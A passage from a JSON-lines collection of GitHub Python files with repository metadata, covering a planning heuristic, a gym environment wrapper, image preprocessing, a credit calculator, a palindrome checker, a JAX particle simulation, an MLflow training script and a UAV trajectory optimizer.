write_actions_states_occurred(self, current_state):\n data = 'Actions and States occurred per level \\n' + '-' * 50 + '\\n'\n for level in range(current_state):\n data += 'At level {} we had {} states and we found {} new actions\\n'.format(\n level, len(self.states[level]), len(self.action_state[level]))\n data += '\\nStates: \\n'\n for state in self.states[level]:\n data += \"%s - Hadd value: %d \\n\" % (', '.join(state[:len(state) - 1]), state[len(state) - 1])\n data += '\\nActions: \\n'\n for action in self.action_state[level]:\n data += action.__str__()\n data += '-' * 100 + '\\n'\n\n # write last level's states\n data += 'At level {} we had {} states\\n'.format(current_state, len(self.states[current_state]))\n data += '\\nStates: \\n'\n for state in self.states[current_state]:\n data += \"%s - Hadd value: %d \\n\" % (', '.join(state[:len(state) - 1]), state[len(state) - 1])\n\n data += '\\n' + '-' * 100 + '\\n'\n if self.g_node == 0:\n data += \"We did not find all goals so we did not calculate G node value\"\n else:\n data += \"G node had Hadd value = {}\".format(self.g_node)\n\n with open('results.txt', 'w') as f:\n f.write(data)\n\n\nif __name__ == '__main__':\n domain = \"Depots.pddl\"\n problem = \"pfile1.pddl\"\n planner = Planner(domain, problem)\n planner.relaxation_plan()\n","repo_name":"PPavlidis7/Aida-Planning-and-Scheduling","sub_path":"hw_03/relaxation.py","file_name":"relaxation.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73869487908","text":"from typing import (\n Any,\n Dict,\n List,\n Mapping,\n Optional,\n Tuple,\n Type,\n TypeVar,\n)\n\nimport gymnasium as gym\n\nfrom .agents import Agent, AgentID\nfrom .env import PhantomEnv\nfrom .policy import Policy\n\n\nObsType = TypeVar(\"ObsType\")\nActType = TypeVar(\"ActType\")\n\n\nclass SingleAgentEnvAdapter(gym.Env):\n \"\"\"\n Wraps a :class:`PhantomEnv` instance or sub-class providing a fully compatible\n :class:`gym.Env` interface, from the perspective of a single agent.\n\n This can be used to test and experiment with Phantom environments using other\n single-agent only frameworks when only one agent is an active learning agent.\n\n Arguments:\n env_class: The :class:`PhantomEnv` class or sub-class to wrap (note: must not be\n an already initialised class instance)\n agent_id: The ID of the agent that the wrapper will explicitly control.\n other_policies: A mapping of all other agent IDs to their policies and policy\n configs. The policies must be fixed/pre-trained policies.\n env_config: Any config options to pass to the underlying env when initialising.\n \"\"\"\n\n def __init__(\n self,\n env_class: Type[PhantomEnv],\n agent_id: AgentID,\n other_policies: Mapping[AgentID, Tuple[Type[Policy], Mapping[str, Any]]],\n env_config: Optional[Mapping[str, Any]] = None,\n ) -> None:\n self._env = env_class(**(env_config or {}))\n\n # Check selected agent exists\n if agent_id not in self._env.agent_ids:\n raise ValueError(\n f\"Selected agent '{agent_id}' of SingleAgentEnvAdapter not found in underlying env '{env_class.__name__}'\"\n )\n\n # Check selected agent isn't given policy\n if agent_id in other_policies:\n raise ValueError(\n f\"Selected agent '{agent_id}' of SingleAgentEnvAdapter found in agent ID to policy mapping\"\n )\n\n # Check all acting agents have assigned policies\n policies = list(other_policies.keys()) + [agent_id]\n\n for agent in self._env.agents.values():\n if agent.action_space is not None and agent.id not in policies:\n raise ValueError(\n f\"Agent '{agent_id}' has not been defined a policy via the 'other_policies' parameter of SingleAgentEnvAdapter\"\n )\n\n self._env.reset()\n\n self._agent_id = agent_id\n\n self._other_policies = {\n agent_id: policy_class(\n self._env[agent_id].observation_space,\n self._env[agent_id].action_space,\n **policy_config,\n )\n for agent_id, (policy_class, policy_config) in other_policies.items()\n }\n\n self._actions: Dict[AgentID, Any] = {}\n self._observations: Dict[AgentID, Any] = {}\n\n super().__init__()\n\n @property\n def active_agent(self) -> AgentID:\n return self._agent_id\n\n @property\n def agents(self) -> Dict[AgentID, Agent]:\n \"\"\"Return a mapping of agent IDs to agents in the environment.\"\"\"\n return self._env.agents\n\n @property\n def agent_ids(self) -> List[AgentID]:\n \"\"\"Return a list of the IDs of the agents in the environment.\"\"\"\n return self._env.agent_ids\n\n @property\n def n_agents(self) -> int:\n \"\"\"Return the number of agents in the environment.\"\"\"\n return self._env.n_agents\n\n @property\n def current_step(self) -> int:\n \"\"\"Return the current step of the environment.\"\"\"\n return self._env.current_step\n\n @property\n def action_space(self) -> gym.Space:\n \"\"\"Return the action space of the selected env agent.\"\"\"\n return self._env[self._agent_id].action_space\n\n @property\n def observation_space(self) -> gym.Space:\n \"\"\"Return the observation space of the selected env agent.\"\"\"\n return self._env[self._agent_id].observation_space\n\n def step(self, action: ActType) -> Tuple[ObsType, float, bool, dict]:\n \"\"\"\n Run one timestep of the environment's dynamics.\n\n When end of episode is reached, you are responsible for calling :meth:`reset` to\n reset this environment's state.\n\n Accepts an action and returns a tuple `(observation, reward, done, info)`.\n\n Args:\n action: an action provided by the agent\n\n Returns:\n observation: this will be an element of the environment's\n :attr:`observation_space`. This may, for instance, be a numpy array\n containing the positions and velocities of certain objects.\n reward: The amount of reward returned as a result of taking the action.\n terminated: Whether the agent reaches the terminal state (as defined under\n the MDP of the task) which can be positive or negative. An example is\n reaching the goal state or moving into the lava from the Sutton and\n Barton, Gridworld. If true, the user needs to call reset().\n truncated: Whether the truncation condition outside the scope of the MDP is\n satisfied. Typically, this is a timelimit, but could also be used to\n indicate an agent physically going out of bounds. Can be used to end the\n episode prematurely before a terminal state is reached. If true, the\n user needs to call reset().\n info: A dictionary that may contain additional information regarding the\n reason for a ``done`` signal. `info` contains auxiliary diagnostic\n information (helpful for debugging, learning, and logging). This might,\n for instance, contain: metrics that describe the agent's performance\n state, variables that are hidden from observations, information that\n distinguishes truncation and termination or individual reward terms\n that are combined to produce the total reward\n \"\"\"\n\n self._actions = {\n agent_id: policy.compute_action(self._observations[agent_id])\n for agent_id, policy in self._other_policies.items()\n }\n\n self._actions[self._agent_id] = action\n\n step = self._env.step(self._actions)\n\n self._observations = step.observations\n\n return (\n step.observations[self._agent_id],\n step.rewards[self._agent_id],\n step.terminations[self._agent_id],\n step.truncations[self._agent_id],\n step.infos[self._agent_id],\n )\n\n def reset(self) -> Tuple[ObsType, Dict[str, Any]]:\n \"\"\"\n Resets the environment to an initial state and returns an initial observation.\n\n Note that this function should not reset the environment's random number\n generator(s); random variables in the environment's state should be sampled\n independently between multiple calls to `reset()`. In other words, each call of\n `reset()` should yield an environment suitable for a new episode, independent of\n previous episodes.\n\n Returns:\n - The initial observation.\n - A dictionary with auxillary information, equivalent to the info dictionary\n in `env.step()`.\n \"\"\"\n\n # TODO: update function interface when gym version is updated\n\n self._observations, infos = self._env.reset()\n\n return self._observations[self._agent_id], infos\n","repo_name":"jpmorganchase/Phantom","sub_path":"phantom/env_wrappers.py","file_name":"env_wrappers.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"}
+{"seq_id":"34667352685","text":"#### Using keras to preprocess images before feeding into tensorflow model. ###\n\nimport tensorflow as tf\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\n\ndef central_crop_images(images, output_height, output_width):\n \"\"\"crop the central part of the images.\n Args:\n images: numpy image data, [N, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A cropped images tensor [N, output_height, output_width, channels]\n \"\"\"\n _,H, W,_ = images.shape\n start_idx_H = H//2 - output_height//2\n end_idx_H = H//2 + output_height//2\n start_idx_W = W//2 - output_width//2\n end_idx_W = W//2 + output_width//2\n return images[:,start_idx_H: end_idx_H,start_idx_W: end_idx_W, :]\n\ndef batch_data_generator_train(X, y, batch_size):\n \"\"\" generate a batch of training data and labels, with original dataset.\n Args:\n X: data set [N, height, width, channels]\n y: labels [N, num_classes]\n batch_size: batch size\n \n Returns:\n A batch of transformed data after augmentation [batch_size, height, width, channels]\n \"\"\"\n _, height, width, channels = X.shape\n _, num_classes = y.shape\n datagen = ImageDataGenerator(featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range = 360,\n width_shift_range=0.15,\n height_shift_range=0.15,\n shear_range=0.,\n zoom_range=0.,\n channel_shift_range=0.,\n fill_mode=\"nearest\",\n cval=0.,\n horizontal_flip=True,\n vertical_flip=True,\n rescale=None,\n preprocessing_function = None,\n data_format=\"channels_last\")\n return datagen.flow(X, y, batch_size = batch_size)\n \ndef preprocess_for_train_single_image(image, output_height, output_width):\n \"\"\"Preprocesses a single image for training.\n Args:\n image: A `Tensor` [height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3),\n ['Rank of image must be equal to 3.'])\n assert output_height==output_width, 'output_height and output_width must be equal'\n H, W, C = image.get_shape()\n \n # central crop\n central_fraction = float(output_height)/float(H)\n image = tf.image.central_crop(image, central_fraction)\n # random flip up and down, right and left.\n image = tf.image.random_flip_up_down(image)\n image = tf.image.random_flip_left_right(image)\n #randomly transpose the image\n if np.random.rand(1) > 0.5:\n image = tf.image.transpose_image(image)\n \n #rotate images by random number of 90 degree.\n k = np.random.randint(4, size=1)\n if k!=0:\n image = tf.image.rot90(image, k = k)\n \n #adjust random brightness a little bit.\n max_delta = 0.2\n image = tf.image.random_brightness(image, max_delta)\n \n # randomly perturbing the saturation.\n saturation_lower = 0.9\n saturation_upper = 1.1\n image = tf.image.random_saturation(image, lower, upper)\n return image\n\n\ndef preprocess_for_eval_single_image(image, output_height, output_width):\n \"\"\"Preprocesses a single image for evaluation.\n Args:\n image: A `Tensor` [height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3),\n ['Rank of image must be equal to 3.'])\n assert output_height==output_width, 'output_height and output_width must be equal'\n H, W, C = image.get_shape()\n \n # central crop\n central_fraction = float(output_height)/float(H)\n image = tf.image.central_crop(image, central_fraction)\n \n return image\n\n\ndef preprocess_for_train(images, output_height, output_width):\n \n \"\"\"Preprocesses images for training.\n Args:\n image: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n N, _ ,_ , channels = images.get_shape()\n # central crop\n images_processed = tf.zeros((N,output_height, output_width, channels))\n for i in range(N):\n images_processed[i,:,:,:] = \\\n preprocess_for_train_single_image(images[i,:,:,:], output_height, output_width)\n return images_processed\n\ndef preprocess_for_eval(images, output_height, output_width):\n \n \"\"\"Preprocesses images for evaluation.\n Args:\n image: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n N, _ ,_ , channels = images.get_shape()\n # central crop\n images_processed = tf.zeros((N,output_height, output_width, channels))\n for i in range(N):\n images_processed[i,:,:,:] = \\\n preprocess_for_eval_single_image(images[i,:,:,:], output_height, output_width)\n return images_processed\n \n\ndef preprocess_images(images, output_height, output_width, is_training=False):\n \"\"\"Preprocesses the given image.\n Args:\n image: A `Tensor` [batch_size, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n is_training: `True` if we're preprocessing the image for training and\n `False` otherwise.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n if is_training:\n return preprocess_for_train(images, output_height, output_width)\n else:\n return preprocess_for_eval(image, output_height, output_width)\n\n","repo_name":"chaovite/cs231n-kaggle-amazon","sub_path":"models/image_prep_helpers.py","file_name":"image_prep_helpers.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14530604393","text":"import math\nimport argparse\nimport sys\n\ncredit_principal = 'Credit principal: 1000'\nfinal_output = 'The credit has been repaid!'\nfirst_month = 'Month 1: paid out 250'\nsecond_month = 'Month 2: paid out 250'\nthird_month = 'Month 3: paid out 500'\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--type\", type=str, help=\"input type of calculation\")\n\ndef check_positive(value):\n ivalue = float(value)\n if ivalue <= 0:\n print(\"Incorrect parameters\")\n #sys.exit()\n return ivalue\n\n\nparser.add_argument(\"--principal\", type=check_positive, help=\"input value of credit principal\")\nparser.add_argument(\"--interest\", type=check_positive, help=\"input value of credit interest\")\nparser.add_argument(\"--periods\", type=check_positive, help=\"input count of periods\")\nparser.add_argument(\"--payment\", type=check_positive, help=\"input monthly payment\")\n\nargs = parser.parse_args()\n\nif args.interest:\n #ANNUITY\n if args.type == \"annuity\":\n if args.payment and args.principal and not args.periods:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n periods_calculation = (math.ceil(\n math.log((args.payment / (args.payment - nominal_interest_rate * args.principal)), (1 + nominal_interest_rate))))\n years = math.floor(periods_calculation / 12)\n months = periods_calculation % 12\n\n # count of period string formatting\n years_over_one = f\"year{'s' if years > 1 else ''}\"\n andicko = f\"{' and ' if years != 0 and months != 0 else ''}\"\n years_over_zero = f'{years} {years_over_one}{andicko}'\n years_final = f\"{years_over_zero if years > 0 else ''}\"\n\n months_over_one = f\"month{'s' if months > 1 else ''}\"\n months_over_zero = f'{months} {months_over_one}'\n months_final = f\"{months_over_zero if months > 0 else ''}\"\n\n # output\n periods_output = f\"You need {years_final}{months_final} to repay this credit!\"\n print(periods_output)\n print(\"Overpayment = {:.0f}\".format(args.payment * periods_calculation - args.principal))\n\n elif args.principal and args.periods and not args.payment:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n payment_calculation = math.ceil(args.principal * (\n (nominal_interest_rate * math.pow((1 + nominal_interest_rate), args.periods)) / (\n math.pow((1 + nominal_interest_rate), args.periods) - 1)))\n\n # output\n payment_output = (\"Your annuity payment = {:.0f}!\".format(payment_calculation))\n print(payment_output)\n print(\"Overpayment = {:.0f}\".format(payment_calculation * args.periods - args.principal))\n\n elif args.payment and args.periods and not args.principal:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n # calculations\n principal_calculation = int(args.payment / (\n (nominal_interest_rate * math.pow((1 + nominal_interest_rate), args.periods)) / (\n math.pow((1 + nominal_interest_rate), args.periods) - 1)))\n\n # output\n principal_output = f\"Your credit principal = {principal_calculation}!\"\n print(principal_output)\n print(\"Overpayment = {:.0f}\".format(args.payment * args.periods - principal_calculation))\n\n # DIFFERENTIATE\n elif args.type == \"diff\":\n if args.payment:\n print(\"Incorrect parameters\")\n elif args.principal and args.periods:\n\n nominal_interest_rate = float((args.interest / 100) / (12 * 1))\n\n current_period = 1\n paid = 0\n while current_period <= args.periods:\n diff_payment = math.ceil(args.principal/args.periods + nominal_interest_rate * (args.principal - (args.principal *\n (current_period - 1)) / args.periods))\n print(\"Month {}: paid out {:.0f}\".format(current_period, diff_payment))\n paid += diff_payment\n current_period += 1\n print(\"Overpayment = {:.0f}\".format(paid - args.principal))\n\n else:\n print(\"Incorrect parameters\")\nelse:\n print(\"Incorrect parameters\")\n\nprint(final_output)\n","repo_name":"simaskova/creditcalc","sub_path":"creditcalc.py","file_name":"creditcalc.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"24776042546","text":"import string\n\ndef format_string(text):\n boolean_li = []\n text = text.lower().translate(str.maketrans('','',string.punctuation)).replace(' ','')\n j = len(text) - 1\n for i in range(int(len(text)/2)):\n if j >= 0:\n if text[i] == text[j]:\n boolean_li.append(True)\n j -= 1 \n \n\n if len(boolean_li) > 0:\n print(\"Word is a palindrome!\")\n else:\n print(\"Word is not a palindrome!\") \n\ndef main():\n text = input(\"Give word to check if it is a palindrome \")\n format_string(text)\n\nif __name__ == \"__main__\":\n main() \n \n#checks if user-given word is a palindrome after space and punctuation removal\n","repo_name":"Buffito/Exercises","sub_path":"check_palindrome.py","file_name":"check_palindrome.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"8331749754","text":"import diotima.world.physics as physics\n\nimport jax\nimport jax.numpy as jnp\nfrom jax._src.prng import PRNGKeyArray\nfrom jax import Array\n\nfrom typing import NamedTuple\nfrom collections import namedtuple\nfrom functools import partial\n\n\nclass UniverseConfig(NamedTuple):\n \"\"\"\n Object containing universe configuration details.\n \"\"\"\n\n n_elems: int\n n_atoms: int\n n_dims: int\n dt: float\n physics_config: Array\n elem_distrib: Array\n batch_size: int = 2\n\n\ndef default_universe_config():\n n_elems = 3\n\n return UniverseConfig(\n n_elems,\n n_atoms=4,\n n_dims=2,\n dt=0.1,\n physics_config=physics.default_physics_config(n_elems),\n elem_distrib=physics.default_elem_distrib(n_elems),\n )\n\n\nclass Universe(NamedTuple):\n \"\"\"\n Object holding universe state.\n \"\"\"\n\n atom_locs: Array\n atom_elems: Array\n locs_history: Array = None\n jac_history: Array = None\n step: int = 0\n\n\ndef seed(\n universe_config: UniverseConfig, key: PRNGKeyArray = jax.random.PRNGKey(0)\n) -> Universe:\n \"\"\"\n Seed universe (i.e. assign pseudorandom atom locations and elements).\n\n Args:\n universe_config: Universe configuration to use in seeding universe.\n key: PRNG key to use in determining atom locations and elements.\n\n Returns:\n Seeded universe object.\n \"\"\"\n # TODO: Unfix key\n key_locs, key_elems = jax.random.split(key, num=2)\n atom_locs = jax.random.normal(\n key_locs,\n shape=(universe_config.n_atoms, universe_config.n_dims),\n dtype=\"float32\",\n )\n atom_elems = physics.elem_distrib_to_elems(\n universe_config.n_atoms,\n universe_config.n_elems,\n universe_config.elem_distrib,\n key_elems,\n )\n\n return Universe(atom_locs, atom_elems)\n\n\ndef run(\n universe: Universe,\n universe_config: UniverseConfig,\n n_steps: int = 1,\n get_jac: bool = False,\n init_adv_opt=None,\n) -> Universe:\n \"\"\"\n Run universe `n_steps` forward.\n\n Args:\n universe: Starting universe to run forward.\n n_steps: Number of steps to run universe forward.\n get_jac: Whether to also compute the grad-based causal graph.\n\n Returns:\n Update universe object.\n \"\"\"\n\n def pure_step(state, _):\n snapshot, adv_opt = state\n new_snapshot = physics.step(\n snapshot.locs, universe.atom_elems, universe_config, get_jac\n )\n\n if adv_opt:\n key, subkey = jax.random.split(adv_opt.key, num=2)\n delta = (\n jax.random.normal(\n subkey,\n shape=(\n universe_config.n_atoms,\n universe_config.n_dims,\n ),\n dtype=\"float32\",\n )\n * 0\n # TODO: Add back adv opt.\n )\n new_snapshot = physics.Snapshot(new_snapshot.locs + delta, new_snapshot.jac)\n adv_opt = BrownianOptimizer(key)\n\n state = new_snapshot, adv_opt\n return state, state\n\n last_state, state_history = jax.lax.scan(\n pure_step,\n (\n physics.first_snapshot(universe.atom_locs, universe_config),\n init_adv_opt,\n ),\n None,\n n_steps,\n )\n last_state = last_state[0]\n state_history = state_history[0]\n\n if universe.locs_history is not None:\n updated_locs_history = jnp.concatenate(\n (universe.locs_history, state_history.locs)\n )\n updated_jac_history = jnp.concatenate((universe.jac_history, state_history.jac))\n else:\n updated_locs_history = state_history.locs\n updated_jac_history = state_history.jac\n\n return Universe(\n last_state.locs,\n universe.atom_elems,\n updated_locs_history,\n updated_jac_history,\n universe.step + n_steps,\n )\n\n\nclass BrownianOptimizer(NamedTuple):\n key: PRNGKeyArray\n\n\ndef spawn_counterfactuals(\n universe: Universe,\n universe_config: UniverseConfig,\n start: int,\n n_cfs: int,\n key: PRNGKeyArray = jax.random.PRNGKey(0),\n):\n \"\"\"\n Instantiate new universes based on specified one, by adversarially optimizing from `start` into `n_cfs` counterfactuals.\n \"\"\"\n assert start >= 0 and start < universe.step\n\n # Isolate common thread.\n common_thread = trim(universe, start)\n\n # Split into n_cfs keys.\n keys = jax.random.split(key, num=n_cfs)\n\n # Run universes forward using adversarial optimizers\n def spawn_counterfactual(key):\n return run(\n common_thread,\n universe_config,\n universe.step - start,\n False,\n BrownianOptimizer(key),\n )\n\n counterfactuals = jax.vmap(spawn_counterfactual)(keys)\n\n return counterfactuals\n\n\ndef trim(\n universe: Universe,\n until: int,\n):\n \"\"\"\n Given universe, return universe as if only until `until` timestep.\n \"\"\"\n assert until < universe.step\n\n return Universe(\n universe.locs_history[until - 1],\n universe.atom_elems,\n universe.locs_history[:until],\n universe.jac_history[:until],\n until,\n )\n","repo_name":"paulbricman/diotima","sub_path":"diotima/world/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8604884185","text":"import os\nimport cv2 as cv\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.applications import DenseNet201\nfrom tensorflow.keras import layers, Model, optimizers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ReduceLROnPlateau\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.utils import to_categorical\nimport mlflow\nimport mlflow.keras\nimport keras.backend as K\nfrom keras.optimizers import Adam\nfrom sklearn.metrics import classification_report\n\nfrom sklearn.metrics import confusion_matrix\n\n# Set the MLflow experiment name\nmlflow.set_experiment(\"project\")\n\n# Set the root directory containing the data\nroot = \"/app/data/\"\n\n# Read the images and store them in arrays\nx = []\ny = []\nclassnames = os.listdir(root)\nfor clas in classnames:\n img_path = os.path.join(root, clas)\n class_num = classnames.index(clas)\n for image in os.listdir(img_path):\n try:\n ip = os.path.join(img_path, image)\n img_array = cv.imread(ip, cv.IMREAD_COLOR)\n n_array = cv.resize(img_array, (256, 192))\n x.append(n_array)\n y.append(class_num)\n except:\n pass\n\n# Split the data into training and validation sets\nx_train, x_val, y_train, y_val = train_test_split(\n x, y, random_state=104, test_size=0.45, shuffle=True\n)\nx_train = np.array(x_train)\ny_train = np.array(y_train)\nx_val = np.array(x_val)\ny_val = np.array(y_val)\n\n# Convert the labels to categorical\ny_train = to_categorical(y_train)\ny_val = to_categorical(y_val)\n\n# Define the model architecture\npre_trained_model = DenseNet201(\n input_shape=(192, 256, 3), include_top=False, weights=\"imagenet\"\n)\n\nfor layer in pre_trained_model.layers:\n print(layer.name)\n if hasattr(layer, \"moving_mean\") and hasattr(layer, \"moving_variance\"):\n layer.trainable = True\n K.eval(K.update(layer.moving_mean, K.zeros_like(layer.moving_mean)))\n K.eval(K.update(layer.moving_variance, K.zeros_like(layer.moving_variance)))\n else:\n layer.trainable = False\nlast_layer = pre_trained_model.get_layer(\"relu\")\nprint(\"last layer output shape:\", last_layer.output_shape)\nlast_output = last_layer.output\n\n# Compile the model\nx = layers.GlobalMaxPooling2D()(last_output)\nx = layers.Dense(512, activation=\"relu\")(x)\n\nx = layers.Dropout(0.5)(x)\n\nx = layers.Dense(9, activation=\"softmax\")(x)\n\n\nmodel = Model(pre_trained_model.input, x)\noptimizer = Adam(\n lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=True\n)\nmodel.compile(\n loss=\"categorical_crossentropy\", optimizer=optimizer, metrics=[\"accuracy\"]\n)\n\n# Start the MLflow run\nwith mlflow.start_run():\n # Enable MLflow autologging\n mlflow.keras.autolog()\n\n # Train the model\n batch_size = 24\n epochs = 1\n history = model.fit(\n x=np.array(x_train),\n y=np.array(y_train),\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(np.array(x_val), np.array(y_val)),\n verbose=1,\n steps_per_epoch=(len(x_train) // batch_size),\n validation_steps=(len(x_val) // batch_size),\n callbacks=[ReduceLROnPlateau()],\n )\n\n # Save the model\n model.save(\"dense-net-finetuned\")\n\n # Log the model as an artifact\n mlflow.log_artifact(\"dense-net-finetuned\")\n\n # Evaluate the model\n # Evaluate the model\n loss_test, acc_test = model.evaluate(np.array(x_val), np.array(y_val), verbose=1)\n\n # Log metrics\n mlflow.log_metric(\"accuracy\", acc_test)\n mlflow.log_metric(\"loss\", loss_test)\n\n # Log the classification report\n y_pred = model.predict(np.array(x_val))\n y_pred_labels = np.argmax(y_pred, axis=1)\n y_true_labels = np.argmax(np.array(y_val), axis=1)\n\n # cm = confusion_matrix(y_true_labels, y_pred_labels)\n # cm_string = \"\\n\".join([str(row) for row in cm])\n # mlflow.log_metric(\"confusion_matrix\", cm_string)\n\n # # Calculate and log the classification report\n # clr = classification_report(y_true_labels, y_pred_labels, zero_division=1)\n # mlflow.log_metric(\"classification_report\", clr)\n\n# End the MLflow run\nmlflow.end_run()\n","repo_name":"farazamjad/FYP","sub_path":"Set_mlflow.py","file_name":"Set_mlflow.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35141379015","text":"import datetime\n#import pytz\n\nimport numpy as np \nimport random \nimport math\nimport networkx as nx\nimport mosek.fusion as mf\nimport sys\nimport time\nimport os\n\nimport utils\nimport vis\n\n#date = datetime.datetime.now()\n#time_str = date.strftime(\"[%m-%d][%H%M]\")\n\nclass ma_sca():\n def __init__(self, K, M, GT, B, F, v_max=0.2, h_min=0.2, graph_max_edge_dist=0.5, Q=None, P=None, plotter=None):\n\n #init shen params\n self.d = np.zeros((K, K, M))\n self.I = np.zeros((K, M))\n self.gt = GT\n self.gamma = 10**11 / B\n self.eps = 0.01 #itr tolerance\n self.B = B\n self.F = F\n\n if Q is not None:\n self.q = Q\n else:\n self.q = np.zeros((K, M, 2))\n\n if P is not None:\n self.p = P\n else:\n self.p = np.zeros((K, M))\n\n if plotter is not None:\n self.plotter = plotter\n\n '''\n for k in range(K):\n print(\"\\\\addplot[color=blue,mark=o] coordinates{\", end='')\n for n in range(M):\n print(\"(%.2f,%.2f)\" % (self.q[k][n][0], self.q[k][n][1]), end='')\n print(\"};\")\n print()\n '''\n\n '''\n for k in range(K):\n print(\"\\\\addplot[color=red,mark=o] coordinates{\", end='')\n for n in range(M):\n print(\"(%d,%.2f)\" % (n, 10 * math.log(self.p[k][n], 10)), end='')\n print(\"};\")\n print()\n '''\n\n self.a = abs(np.sqrt(self.p))\n\n #init graph for coloring based on UAV trajectory ending locations\n self.g_gt = nx.Graph()\n\n self.v_max = v_max\n self.h_min = h_min\n \n date = datetime.datetime.now()\n self.time_str = date.strftime(\"[%m-%d][%H%M]\")\n self.params_str = \"[%df_%dk_%dm_%dv]\" % (len(self.F), K, M, int(self.v_max))\n\n #visualize initial trajectory\n self.plotter.plot_traj(self.q, self.gt)\n\n #update graph based on trajectory endpoints\n self.max_color_dist = graph_max_edge_dist\n self.update_graph(self.q[:,M - 1,:])\n self.f = self.color_graph(self.F)\n\n #self.f = self.naive_freq(2.484)\n\n print('[sca] init complete: K: %d M: %d eps: %f F: %s' % (K, M, self.eps, self.F))\n\n #determine initial d, I, R given p, q, f\n for f in self.f:\n uav_idxs = self.f[f]\n\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n self.rate = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n self.rate = np.multiply(self.rate, self.B)\n\n\n \n if not os.path.exists(\"data/%s%s\" % (self.time_str, self.params_str)):\n os.makedirs(\"data/%s%s\" % (self.time_str, self.params_str))\n\n with open(\"data/%s%s/r_total_init.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"t r\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, np.sum(self.rate, axis=0)[n] / 10**6))\n\n self.rate = np.sum(self.rate)\n print(\"[sca] init R: %f\" % (self.rate))\n \n\n def sca(self):\n K, M = self.a.shape\n eps = 0.00001\n\n while True:\n t_start = time.time()\n #split sca into smaller shen optimizations\n for f in self.f:\n\n #print(f, self.f)\n\n print(\"[sca] F: %.3f\" % (f))\n uav_idxs = self.f[f]\n\n if len(uav_idxs) == 0:\n continue\n\n itr = 0\n while True:\n\n #num_uavs = len(uav_idxs)\n #idx_convert = []\n\n a_f, q_f, p_f, d_f, I_f, gt_f = slice_freq(uav_idxs, self.a, self.q, self.p, self.d, self.I, self.gt)\n var_a, var_q, obj_val = optimize_shen(a_f, q_f, p_f, d_f, I_f, gt_f, self.gamma, self.v_max, self.h_min)\n \n for idx in range(len(uav_idxs)):\n for n in range(M):\n obj_val = obj_val - math.log(1 + I_f[idx][n], 2) + I_f[idx][n] / (1 + I_f[idx][n])\n #unpack a, q from optimizer\n a_temp = np.zeros((len(uav_idxs), M))\n p_temp = np.zeros((len(uav_idxs), M))\n q_temp = np.zeros((len(uav_idxs), M, 2))\n\n for idx in range(len(uav_idxs) * M):\n a_temp[idx // M][idx % M] = var_a.level()[idx]\n p_temp[idx // M][idx % M] = a_temp[idx // M][idx % M]**2\n\n q_temp[idx // M][idx % M][0] = var_q.level()[idx * 2]\n q_temp[idx // M][idx % M][1] = var_q.level()[idx * 2 + 1]\n\n self.a[uav_idxs] = a_temp\n self.p[uav_idxs] = p_temp\n self.q[uav_idxs] = q_temp\n\n #update d, I\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], 